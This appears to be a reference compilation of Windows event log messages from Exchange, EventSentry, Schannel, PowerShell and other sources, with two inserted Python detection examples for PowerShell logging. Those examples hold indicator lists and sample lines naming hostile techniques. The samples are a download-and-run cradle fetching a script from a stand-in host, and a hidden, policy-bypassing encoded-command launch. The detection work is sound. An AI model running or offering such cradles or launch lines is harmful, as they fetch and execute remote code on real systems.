Microsoft-Windows-WER-SystemErrorReporting
Message:
The computer has rebooted from a bugcheck. The bugcheck was: 0x00000116 (0xffffe0008b64c4c0, 0xfffff8003e9d4650, 0x0000000000000000, 0x000000000000000d). A dump was saved in: C:\WINDOWS\MEMORY.DMP. Report Id: 10281589-8be9-d71c-c713-e024f5515a45.


Event ID:
Source:
Microsoft-Windows-WMI
Message:
Windows Management Instrumentation has stopped WMIPRVSE.EXE because a quota reached a warning value. Quota: HandleCount Value: %2 Maximum value: 4096 WMIPRVSE PID: %4 Providers hosted in this process: %systemroot%\system32\wbem\cimwin32.dll


Event ID:
Source:
IIS-Configuration
Message:
Changes to '/system.applicationHost/sites/site[@name="Default Web Site" and @id="1"]/@state' at 'MACHINE/WEBROOT/APPHOST' have successfully been committed.


Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
Starting with EventSentry build 3.2.1.28, the heartbeat agent can query the EventSentry database to determine a remote agent status, instead of querying the remote agent status using the Windows API. This can drastically improve the monitoring speed and is recommended for networks consisting of 50 or more Windows hosts.

To enable this functionality, the following SQL query will need to be executed on the EventSentry database:

--Built-In Database (PostgreSQL)
REVOKE ALL ON TABLE eventsentry.essysinfo FROM eventsentry_svc;
GRANT SELECT, UPDATE, INSERT, DELETE ON TABLE eventsentry.essysinfo TO eventsentry_svc;

-- SQL Server
GRANT SELECT ON ESSysinfo (UptimeTimestamp) TO eventsentry_svc

-- MySQL
GRANT SELECT (computer, Uptime, UptimeMax, UptimeTimestamp), INSERT, UPDATE, UPDATE (UptimeTimestamp, lastserverinventoryupdate), DELETE ON essysinfo TO eventsentry_svc

It is also recommended to set the "Refresh uptime every" interval in the "Inventory" System Health package to 5 minutes.


Event ID:
Source:
Outlook
Message:
Outlook disabled the following add-in(s):

ProgID: GDOfficeAddin.AddinBase
GUID: {0C2EB69C-2B8F-408B-A2C6-E831D1A6C774}
Name: G Data Outlook Add-In
Description: G Data Outlook Add-In
Load Behavior: 3
HKLM: 1
Location: c:\program files (x86)\common files\g data\avkmail\gdofficeaddinx86.dll
Threshold Time (Milliseconds): 1000
Time Taken (Milliseconds): 120875
Disable Reason: This add-in caused Outlook to start slowly.
Policy Exception (Allow List): 0


Event ID:
Source:
MSExchange MailTips
Category:
MailTips
Message:
Process Microsoft.Exchange.InfoWorker.Common.Delayed`1[System.String]: MailTips query failed for mailbox <John Johnny JoeJoe>SMTP:jonjojo@acmecorp.com. Latency: total:1. The returned exception is: Microsoft.Exchange.Data.Storage.StorageTransientException: Cannot open mailbox /o=AcmeCorp/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=EXCHGSERVER/cn=Microsoft System Attendant. ---> Microsoft.Mapi.MapiExceptionRpcServerTooBusy: MapiExceptionRpcServerTooBusy: Unable to make connection to the server. (hr=0x80004005, ec=2419)
Diagnostic context:
Lid: 41841 StoreEc: 0x973
Lid: 51059
Lid: 62321 StoreEc: 0x973
Lid: 47987
Lid: 50033 StoreEc: 0x973
Lid: 50544 ClientVersion: 15.0.995.27
Lid: 52080 StoreEc: 0x973
Lid: 51152
Lid: 52465 StoreEc: 0x973
Lid: 60065
Lid: 33777 StoreEc: 0x973
Lid: 59805
Lid: 52487 StoreEc: 0x973
Lid: 19778
Lid: 27970 StoreEc: 0x973
Lid: 17730
Lid: 25922 StoreEc: 0x973
at Microsoft.Mapi.MapiExceptionHelper.InternalThrowIfErrorOrWarning(String message, Int32 hresult, Boolean allowWarnings, Int32 ec, DiagnosticContext diagCtx, Exception innerException)
at Microsoft.Mapi.MapiExceptionHelper.ThrowIfError(String message, Int32 hresult, IExInterface iUnknown, Exception innerException)


Event ID:
Source:
Microsoft-Windows-Defrag
Message:
The volume WINRE_DRV was not optimized because an error was encountered: The parameter is incorrect. (0x80070057)


Event ID:
Source:
MSExchangeDiagnostics
Category:
General
Message:
Potential data loss warning in RetentionAgent: %1


Event ID:
Source:
MSExchange Store Driver Submission
Category:
Error (Info)
Message:
The store driver failed to submit eventID mailboxID MDBID and couldn't generate an NDR due to exception Microsoft.Exchange.MailboxTransport.StoreDriverCommon.InvalidSenderException


Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
SNMP or agent monitoring of host SOMESERVER has failed 17% of the time over the last 3600 seconds and is now disabled. To re-enable SNMP and/or agent monitoring of host SOMESERVER, restore full connectivity to the remote host, locate the host in the management console and click the "Retry" button in the summary view.


Event ID:
Source:
EventSentry
Category:
Heartbeat Monitoring
Message:
EventSentry was unable to retrieve SNMP data from host somedevice.company.com and cannot monitor this host using SNMP. This event is being logged because this host was successfully monitored via SNMP in the past. To retry, open the management console, select the host and click the retry button on the top right.


Event ID:
Source:
MSExchangeDiagnostics
Message:
ConnectionStringManager unable to connect to partitioning DB: Connection string used to access the partitioning DB is null or empty


Event ID:
Source:
MSExchangeApplicationLogic
Category:
Extension
Message:
Scenario: ProcessKillBit. Failed to read killbit list file because of exception System.IO.IOException: The process cannot access the file 'D:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\owa\prem\15.0.1178.9\ext\killbit\killbit.xml' because it is being used by another process.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share)
at System.IO.File.Open(String path, FileMode mode, FileAccess access, FileShare share)
at Microsoft.Exchange.Data.ApplicationLogic.Extension.KillBitHelper.TryReadKillBitFile(Int32& refreshRate, DateTime& lastModifiedTime)



Event ID:
Source:
MSExchangeFrontEndTransport
Category:
SmtpSend
Message:
The Ehlo options for the client proxy target 10.10.5.123 did not match while setting up proxy for user amata/es_smtp on inbound session 08D40BBF5D3046B3. The mismatched settings might cause some messages to get rejected. Continue with proxying even though there is a mismatch. The critical non-matching options were maxSize. The non-critical non-matching options were .


Event ID:
Source:
Windows Server Update Services
Category:
Core
Message:
The catalog was last synchronized successfully 1 or more days ago.


Event ID:
Source:
Server Administrator
Category:
Storage Service
Message:
Controller battery is discharging: Battery 0 Controller 0


Event ID:
Source:
VSS
Message:
Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface. hr = 0x80070005, Access is denied.
. This is often caused by incorrect security settings in either the writer or requestor process.
Operation:
Gathering Writer Data
Context:
Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
Writer Name: System Writer
Writer Instance ID: {e720aa26-50d9-4d36-93f3-494b8ec76700}


Event ID:
Source:
ESENT
Category:
Performance
Message:
svchost (852) A significant portion of the database buffer cache has been written out to the system paging file. This may result in severe performance degradation.
See help link for complete details of possible causes.
Resident cache has fallen by 5426 buffers (or 99%) in the last 8805 seconds.
Current Total Percent Resident: 0% (2 of 5428 buffers)


Event ID:
Source:
Microsoft-Windows-DNS-Server-Service
Message:
Zone somedomain.local expired before it could obtain a successful zone transfer or update from a master server acting as its source for the zone. The zone has been shut down.


Event ID:
Source:
EventSentry
Category:
Service Monitoring
Message:
The status for service mapsbroker (Downloaded Maps Manager) remains Stopped.

Additional Service Information:

Startup type: Automatic
Executable: C:\Windows\System32\svchost.exe -k NetworkService
Service account: NT AUTHORITY\NetworkService



Event ID:
Source:
Citrix System Monitoring
Category:
None
Message:
The Queue thread stopped responding. The Citrix System Monitoring Agent will shutdown and restart.


Event ID:
Source:
EventSentry
Category:
Collector Client
Message:
The EventSentry agent successfully established a secure connection with the collector (collector.yourdomain.com at port 5001).

Negotiated SSL parameters: Protocol: TLS1.2 Cipher: AES Cipher strength: 128 Hash: SHA256 Hash strength: 256 Key exchange: RSA Key exchange strength: 2048


Event ID:
Source:
EventSentry
Message:
The filter chain for event log package Filter Chain ABC is complete.

Duration: 34 second(s)
Insertion Strings (if any):


Event ID:
Source:
MsiInstaller
Message:
Product: Microsoft Office Professional Plus 2016 - Update '{E296D50E-EFEB-48F5-9CBE-5A335AE2D49F}' could not be installed. Error code 1603. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft.com/fwlink/?LinkId=23127


Event ID:
Source:
DistributedCOM
Category:
none
Message:
DCOM got error "2147944122" from the computer 10.10.10.x when attempting to activate the server {4CB43D7F-7EEE-4906-8698-60DA1C38F2FE}


Event ID:
Source:
Schannel
Category:
none
Message:
The following fatal alert was generated: 10. The internal error state is 1203. Another Event message is listed next;
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The SSL connection request has failed


Event ID:
Source:
Trend Status Check (AV)
Category:
none
Message:
Automated remediation failed. Antivirus Product Trend Status Check - 547 Days Out-Of-Date


Event ID:
Source:
Schannel
Message:
the following fatal alert was received 70


Event ID:
Source:
IPMIDRV
Message:
The IPMI device driver attempted to communicate with the IPMI BMC device during normal operation. However the communication failed due to a timeout. You can increase the timeouts associated with the IPMI device driver.


Event ID:
Source:
Service Control Manager Eventlog Provider
Message:
The windows Modules Installer Service failed to start due to the following error:The Service did not start due to a logon failure


Event ID:
Source:
PowerShell
Category:
Engine Lifecycle
Message:
Engine state is changed from None to Available.

Details:
NewEngineState=Available
PreviousEngineState=None

SequenceNumber=134

HostName=ConsoleHost
HostVersion=2.0
HostId=e14c96d4-bf0d-4a3a-8e84-c7851ebb29d7
EngineVersion=2.0
RunspaceId=7b090c70-10a9-43d7-9ce4-15a8b1bc0e0b
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=


Event ID:
Source:
PowerShell
Category:
Engine Lifecycle
Message:
Engine state is changed from Available to Stopped.

Details:
NewEngineState=Stopped
PreviousEngineState=Available
SequenceNumber=125
HostName=ConsoleHost
HostVersion=2.0
HostId=e668b266-c1e3-4faa-2242-90c012cd4691
EngineVersion=2.0
RunspaceId=ed6416ce-3230-40b2-9d58-c5b709b4f3d9
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=



Event ID:
Source:
PowerShell
Category:
Command Lifecycle
Message:
Command "Write-Host" is Started.

Details:
NewCommandState=Started
SequenceNumber=19
HostName=ConsoleHost
HostVersion=2.0
HostId=1cf19884-fbfb-4930-859a-45bb18793e35
EngineVersion=2.0
RunspaceId=52cbe49e-d6ed-4690-9cff-b96759ed4894
PipelineId=2
CommandName=Write-Host
CommandType=Cmdlet
ScriptName=
CommandPath=
CommandLine=Write-Host Test



Event ID:
Source:
PowerShell
Category:
Command Lifecycle
Message:
Command "Write-Host" is Stopped.

Details:
NewCommandState=Stopped
SequenceNumber=20
HostName=ConsoleHost
HostVersion=2.0
HostId=1cf19884-fbfb-4930-859a-45bb18793e35
EngineVersion=2.0
RunspaceId=52cbe49e-d6ed-4690-9cff-b96759ed4894
PipelineId=2
CommandName=Write-Host
CommandType=Cmdlet
ScriptName=
CommandPath=
CommandLine=Write-Host Test



Event ID:
Source:
PowerShell
Category:
Provider Lifecycle
Message:
Provider "Registry" is Started.

Details:
ProviderName=Registry
NewProviderState=Started
SequenceNumber=6
HostName=ConsoleHost
HostVersion=2.0
HostId=81e282e6-724d-4184-9600-615816366546
EngineVersion=
RunspaceId=
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=


Event ID:
Source:
PowerShell
Category:
Pipeline Execution Details
Message:
Pipeline execution details for command line: Write-Host Test.

Context Information:
DetailSequence=1
DetailTotal=1

SequenceNumber=50

UserId=DOMAIN\username
HostName=ConsoleHost
HostVersion=4.0
HostId=5f2b609e-c195-4914-b7bb-09f492cb0056
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=4.0
RunspaceId=77d31d66-4314-43f4-bf5a-caa6757c2130
PipelineId=8
ScriptName=
CommandLine=Write-Host Test

Details:
CommandInvocation(Write-Host): "Write-Host"
ParameterBinding(Write-Host): name="Object"; value="Test"


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
Executing Pipeline
Message:
Error Message = File C:\Users\wizard\test.ps1 cannot be loaded. The file C:\Users\wizard\test.ps1 is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
Fully Qualified Error ID = UnauthorizedAccess
Recommended Action =
Context:
Severity = Warning
Host Name = ConsoleHost
Host Version = 5.1.14393.1944
Host ID = babd41a2-db0f-45d0-ac50-e34b71dd9ac0
Host Application = powershell . .\test.ps1
Engine Version = 5.1.14393.1944
Runspace ID = 0155307c-603a-440d-a22c-85b5c9cbffff
Pipeline ID = 1
Command Name =
Command Type =
Script Name =
Command Path =
Sequence Number = 15
User = DOMAIN\user
Connected User =
Shell ID = Microsoft.PowerShell
User Data:


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
Executing Pipeline
Message:
CommandInvocation(Write-Host): "Write-Host"
ParameterBinding(Write-Host): name="Object"; value="TestPowerShellV5"


Context:
Severity = Informational
Host Name = ConsoleHost
Host Version = 5.1.14393.1944
Host ID = e44f3df1-0f65-48dc-814a-01219d11a426
Host Application = powershell Write-Host TestPowerShellV5
Engine Version = 5.1.14393.1944
Runspace ID = 0b4180d7-55ca-476a-9712-26e61d5c3be1
Pipeline ID = 1
Command Name = Write-Host
Command Type = Cmdlet
Script Name =
Command Path =
Sequence Number = 16
User = DOMAIN\username
Connected User =
Shell ID = Microsoft.PowerShell


User Data:


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
PowerShell Console Startup
Message:
PowerShell console is starting up


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
PowerShell Console Startup
Message:
PowerShell console is ready for user input


Event ID:
Source:
Microsoft-Windows-PowerShell
Category:
Execute a Remote Command
Message:
Creating Scriptblock text (1 of 1):
Write-Host PowerShellV5ScriptBlockLogging

ScriptBlock ID: 6d90e0bb-e381-4834-8fe2-5e076ad267b3
Path:
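
Script block logging (event 4104, shown above with one part of one) splits large blocks into "(N of M)" parts that share a ScriptBlock ID, so a string match on a single event can miss an indicator that straddles two parts. The Python below is an added example, not part of the original page or of EventSentry: it parses the message layout above, reassembles parts by ID in part order, reports blocks with missing parts, and only then scans the joined text. The sample messages are constructed (the second block is split mid-word on purpose, and arrives out of order), and the indicator list is an illustrative assumption, not a detection rule.

```python
import re
from collections import defaultdict

# Constructed sample 4104 message bodies (not from the original page). The first
# mirrors the single-part entry above; the other two are halves of one script
# block tied together by ScriptBlock ID, logged out of order as collectors often do.
SAMPLE_4104 = [
    "Creating Scriptblock text (1 of 1):\n"
    "Write-Host PowerShellV5ScriptBlockLogging\n\n"
    "ScriptBlock ID: 6d90e0bb-e381-4834-8fe2-5e076ad267b3\n"
    "Path: ",
    "Creating Scriptblock text (2 of 2):\n"
    "ing('http://example.invalid/a.ps1')\n\n"
    "ScriptBlock ID: 11111111-2222-3333-4444-555555555555\n"
    "Path: C:\\Users\\wizard\\test.ps1",
    "Creating Scriptblock text (1 of 2):\n"
    "IEX (New-Object Net.WebClient).DownloadStr\n\n"
    "ScriptBlock ID: 11111111-2222-3333-4444-555555555555\n"
    "Path: C:\\Users\\wizard\\test.ps1",
]

# Header, chunk text, blank line, ScriptBlock ID, Path: the layout seen above.
HEADER = re.compile(
    r"^Creating Scriptblock text \((\d+) of (\d+)\):\r?\n"
    r"(.*)\r?\n\r?\n"
    r"ScriptBlock ID: ([0-9a-fA-F-]{36})\r?\n"
    r"Path: ?(.*)$",
    re.DOTALL,
)

# Substrings worth a second look; an assumed, illustrative list.
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
              "-EncodedCommand", "Reflection.Assembly", "Add-Type")


def parse_4104(message):
    """Split one 4104 message into (part, total, text, block_id, path)."""
    m = HEADER.match(message)
    if not m:
        raise ValueError("not a 4104 script block message")
    part, total, text, block_id, path = m.groups()
    return int(part), int(total), text, block_id, path


def reassemble(messages):
    """Group parts by ScriptBlock ID and join them in part order.

    Chunks are contiguous substrings of the original block, so they are joined
    without a separator. Returns {block_id: {"text", "path", "complete"}}.
    """
    parts = defaultdict(dict)
    meta = {}
    for msg in messages:
        part, total, text, block_id, path = parse_4104(msg)
        parts[block_id][part] = text
        meta[block_id] = (total, path)
    blocks = {}
    for block_id, chunks in parts.items():
        total, path = meta[block_id]
        blocks[block_id] = {
            "text": "".join(chunks[i] for i in sorted(chunks)),
            "path": path,
            "complete": set(chunks) == set(range(1, total + 1)),
        }
    return blocks


def find_indicators(text):
    """Indicator substrings present in a script block, in INDICATORS order."""
    return [ind for ind in INDICATORS if ind in text]


if __name__ == "__main__":
    for block_id, block in reassemble(SAMPLE_4104).items():
        print(block_id, "complete" if block["complete"] else "INCOMPLETE",
              repr(block["path"]), find_indicators(block["text"]))
```

Scanning the first half on its own finds only "IEX"; the joined text also yields "DownloadString". Blocks reported as incomplete usually mean the collector dropped or has not yet shipped a part, which is itself worth knowing before concluding a block was benign.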


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Other Logon/Logoff Events
Message:
A session was disconnected from a Window Station.

Subject:
Account Name: some.user
Account Domain: SOMEDOMAIN
Logon ID: 0x2335b249

Session:
Session Name: RDP-Tcp#0

Additional Information:
Client Name: wksclient04.lo
Client Address: 192.168.1.6


Event ID:
Source:
Microsoft-Windows-Security-Auditing
Category:
Process Termination
Message:
A process has exited.

Subject:
Security ID: MYDOMAIN\some.user
Account Name: some.user
Account Domain: MYDOMAIN
Logon ID: 0x5E006051

Process Information:
Process ID: 0x5ec4
Process Name: C:\Windows\System32\dllhost.exe
Exit Status: 0x0


Event ID:
Source:
SQLSERVERAGENT
Category:
Job Engine
Message:
SQL Server Scheduled Job 'sqlmail test' (0x1C727E7088AC614399AAD98E792DB21C) - Status: Failed - Invoked on: 2018-02-21 07:25:00 - Message: The job failed. The Job was invoked by Schedule 28 (SQL Mail test). The last step to run was step 1 (1).

For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.


Event ID:
Source:
storflt
Category:
none
Message:
The virtual storage filter driver is inactive for ide disk at location (2,0,0,0)


Event ID:
Source:
crypt32
Category:
None
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: Not enough storage is available to complete this operation.


Event ID:
Source:
Netwtw04
Message:
7003 - Roam Complete


Event ID:
Source:
Service Control Manager
Category:
Error
Message:
The Routing and Remote Access service terminated with the following service-specific error: The callback function must be invoked inline.


Event ID:
Source:
RemoteAccess
Category:
Error
Message:
The currently configured accounting provider failed to load and initialize successfully. The connection was prevented because of a policy configured on your RAS/VPN server. Specifically, the authentication method used by the server to verify your username and password may not match the authentication method configured in your connection profile. Please contact the Administrator of the RAS server and notify them of this error.


Event ID:
Source:
Report Server (SSRS)
Category:
(2)
Message:
Log Name: Application
Source: Report Server (SSRS)
Date: 8/12/2020 5:17:12 PM
Event ID: 108
Task Category: (2)
Level: Error
Keywords: Classic
User: N/A
Computer: MASKED.org
Description:
Report Server (SSRS)
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Report Server (SSRS)" />
<EventID Qualifiers="0">108</EventID>
<Level>2</Level>
<Task>2</Task>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2020-08-12T22:17:12.323342900Z" />
<EventRecordID>59464</EventRecordID>
<Channel>Application</Channel>
<Computer>MASKED.org</Computer>
<Security />
</System>
<EventData>
<Data>Report Server (SSRS)</Data>
<Data>ORACLE</Data>
</EventData>
</Event>


Event ID:
Source:
USB\VID_18D1&PID_4EE7&MI_03\7&16246af8&3&0003
Category:
Microsoft-Windows-Kernel-PnP
Message:
2020-12-25 4:37:06 PM Device USB\VID_18D1&PID_4EE7&MI_03\7&16246af8&3&0003 was configured.



Event ID:
Source:
WMI-Activity
Category:
None
Message:
Id = {00000000-0000-0000-0000-000000000000}; ClientMachine = LT-MULLINTI; User = LT-MULLINTI\mtscadmin; ClientProcessId = 8944; Component = Unknown; Operation = Start IWbemServices::ExecNotificationQuery - ROOT\WMI : SELECT * FROM MSNdis_StatusMediaConnect; ResultCode = 0x80041032; PossibleCause = Unknown


Event ID:
Source:
PowerShell
Category:
Executing Pipeline
Message:
Error Message = The parameter is incorrect.

Provider Name = Microsoft.PowerShell.Core\FileSystem

Context:
Severity = Warning
Host Name = InstallShield_PS_Host
Host Version = 1.0.0.0
Host ID = a0925d75-baf4-4609-b69b-8d14a9f85b42
Host Application = C:\Windows\System32\MsiExec.exe -Embedding 99CAFEB8759CB269DF3B8F5AE58B9B8D
Engine Version =
Runspace ID =
Pipeline ID =
Command Name =
Command Type =
Script Name =
Command Path =
Sequence Number = 18
User = DESKTOP-T0MA7N9\pc2
Connected User =
Shell ID = Microsoft.PowerShell

User Data:




Event ID:
Source:
Winlogon
Message:
The winlogon notification subscriber <GPClient> was unavailable to handle a notification event.


Event ID:
Source:
PowerShell
Category:
Engine Lifecycle
Message:
Details:
NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=
Event Xml:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="PowerShell" />
<EventID Qualifiers="0">403</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>4</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime="2021-04-09T00:48:26.1133783Z" />
<EventRecordID>40</EventRecordID>
<Correlation />
<Execution ProcessID="0" ThreadID="0" />
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-BSLE0HC</Computer>
<Security />
</System>
<EventData>
<Data>Stopped</Data>
<Data>Available</Data>
<Data> NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
</EventData>
</Event>
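
The Details block in the 400/403 engine-lifecycle records above carries HostApplication, the full command line PowerShell was launched with, which is often the only place switches such as -EncodedCommand or -ExecutionPolicy Bypass are recorded. The Python below is an added example, not code from the original page or from EventSentry: it parses the Event XML shown above (event namespace, three Data elements), splits the Details into key/value pairs in a way that also works for the space-joined form that appears later on this page, flags launch switches that usually deserve a look, and decodes an -EncodedCommand argument (base64 of UTF-16LE). The XML sample is constructed with a hypothetical computer name and an encoded "Write-Host hi"; the switch patterns are assumptions for this example, not an exhaustive rule set.

```python
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed Event XML (not from the original page), same shape as the 403
# record above, with a hypothetical host and a launch line worth flagging.
SAMPLE_403_XML = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="PowerShell" />
<EventID Qualifiers="0">403</EventID>
<Channel>Windows PowerShell</Channel>
<Computer>WS01.example.invalid</Computer>
</System>
<EventData>
<Data>Stopped</Data>
<Data>Available</Data>
<Data>NewEngineState=Stopped
PreviousEngineState=Available

SequenceNumber=15

HostName=ConsoleHost
HostVersion=5.1.19041.610
HostId=fc1e08f5-6fa2-4b1f-b078-71504abeb1c1
HostApplication=powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -EncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgAGgAaQA=
EngineVersion=5.1.19041.610
RunspaceId=2825a70e-71d0-4804-9516-922aee2bdbfe
PipelineId=
CommandName=
CommandType=
ScriptName=
CommandPath=
CommandLine=</Data>
</EventData>
</Event>"""

# The same kind of Details block as some collectors flatten it onto one line.
SAMPLE_403_FLAT = ("NewEngineState=Stopped PreviousEngineState=Available SequenceNumber=15 "
                   "HostName=ConsoleHost HostVersion=5.1.22598.1 HostId=46dc6910-488c-4202-a87a-de50e5ed56c4 "
                   "HostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1'; "
                   "EngineVersion=5.1.22598.1 RunspaceId=c9ce49c6-29b1-4d28-85df-b7c49d562b06 PipelineId= "
                   "CommandName= CommandType= ScriptName= CommandPath= CommandLine=")

DETAIL_KEYS = ("NewEngineState", "PreviousEngineState", "SequenceNumber", "HostName",
               "HostVersion", "HostId", "HostApplication", "EngineVersion", "RunspaceId",
               "PipelineId", "CommandName", "CommandType", "ScriptName", "CommandPath",
               "CommandLine")
KEY_RE = re.compile(r"(?:^|\s)(" + "|".join(DETAIL_KEYS) + r")=")


def parse_details(text):
    """Split a Details block into a dict, whether newline- or space-separated.

    Each value runs up to the next known key, so a HostApplication containing
    spaces or '=' signs (not directly after a known key name) stays intact.
    """
    matches = list(KEY_RE.finditer(text))
    details = {}
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(text)
        details[m.group(1)] = text[m.end():end].strip()
    return details


def parse_event_xml(xml_text):
    """Return (event_id, computer, details) from a PowerShell 400/403 Event XML."""
    root = ET.fromstring(xml_text)
    event_id = int(root.find("e:System/e:EventID", NS).text)
    computer = root.find("e:System/e:Computer", NS).text
    data = [d.text or "" for d in root.findall("e:EventData/e:Data", NS)]
    # Data[0] and Data[1] repeat the new/previous state; Data[2] holds the Details.
    details = parse_details(data[2]) if len(data) >= 3 else {}
    return event_id, computer, details


# Launch switches that merit review (assumed patterns). PowerShell accepts any
# unambiguous prefix (-ec, -enc, -ep, -w, -nop ...), so the regexes allow for it.
HOST_APP_RULES = (
    ("encoded command", r"(?:^|\s)-e(?:c|nc|ncodedcommand)?(?=\s)"),
    ("hidden window", r"(?:^|\s)-w[a-z]*\s+hidden(?=\s|$)"),
    ("execution policy bypass", r"(?:^|\s)-e[a-z]*\s+(?:bypass|unrestricted)(?=\s|$)"),
    ("profile skipped", r"(?:^|\s)-nop[a-z]*(?=\s|$)"),
    ("non-interactive", r"(?:^|\s)-noni[a-z]*(?=\s|$)"),
    ("download cradle", r"downloadstring|downloadfile|invoke-expression|(?:^|\s|\()iex(?=\s|\()"),
)
ENCODED_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def flag_host_application(host_app):
    """Names of the HOST_APP_RULES that match the launch command line."""
    return [name for name, pat in HOST_APP_RULES if re.search(pat, host_app, re.IGNORECASE)]


def decode_encoded_command(host_app):
    """Plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENCODED_RE.search(host_app)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    event_id, computer, details = parse_event_xml(SAMPLE_403_XML)
    app = details["HostApplication"]
    print(event_id, computer, flag_host_application(app), decode_encoded_command(app))
    print(flag_host_application(parse_details(SAMPLE_403_FLAT)["HostApplication"]))
```

The 400 (engine started) record is the one to key detections on, since it is written before any command runs; 403 is its closing counterpart with the same Details and is useful for pairing start and stop. Neither record contains the script body, which is why script block logging (4104) is still needed alongside.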


Event ID:
Source:
Disk
Category:
None
Message:
The IO operation at logical block address 0x6ed378 for Disk 0 (PDO name: \Device\00000031) was retried.


Event ID:
Source:
NetBT
Category:
None
Message:
Initialization failed because the driver device could not be created. Use the string "000000000100320000000000D71000C011010000250200C001000000000000000000000000000000" to identify the interface for which initialization failed. It represents the MAC address of the failed interface or the Globally Unique Interface Identifier (GUID) if NetBT was unable to map from GUID to MAC address. If neither the MAC address nor the GUID were available, the string represents a cluster device name.


Event ID:
Source:
Microsoft-Windows-PerfProc
Message:
Warning JAMESON-PC\jcamp


Event ID:
Source:
Service Control Manager
Category:
None
Message:
The Remote Desktop Services service terminated due to an error The specified file cannot be found.


Event ID:
Source:
Microsoft-Windows-ActiveDirectory_DomainService
Category:
Security
Message:
The directory has been configured to not enforce per-attribute authorization during LDAP add operations. Warning events will be logged, but no requests will be blocked. This setting is not secure and should only be used as a temporary troubleshooting step. Please review the suggested mitigations in the link below.

https://go.microsoft.com/fwlink/?linkid=2174032


Event ID:
Source:
OneApp_IGCC_WinService
Category:
none
Message:
TLBs created - Done


Event ID:
Source:
Kernel-EventTracing
Message:
Starting the session "Microsoft.Windows.Remediation" failed with the following error: 0xC0000035


Event ID:
Source:
Goodix
Message:
Message: [0301-01:57:16:346][PID:1588][TID:08432][GFDrv][error][_GetAcDcSettingIndex:04098] Goodix>>> ACSettingIndex fail


Event ID:
Source:
Windows Update Agent
Category:
Software Sync
Message:
Unable to connect: Windows is unable to connect to the Automatic Updates service and therefore cannot download and install updates according to the set schedule. Windows will continue to try to establish a connection.


Event ID:
Source:
Security-SPP
Category:
None
Message:
License Activation (slui.exe) failed with the following error code: hr=0x803F7001
Command-line arguments: RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=UserLogon;SessionId=2


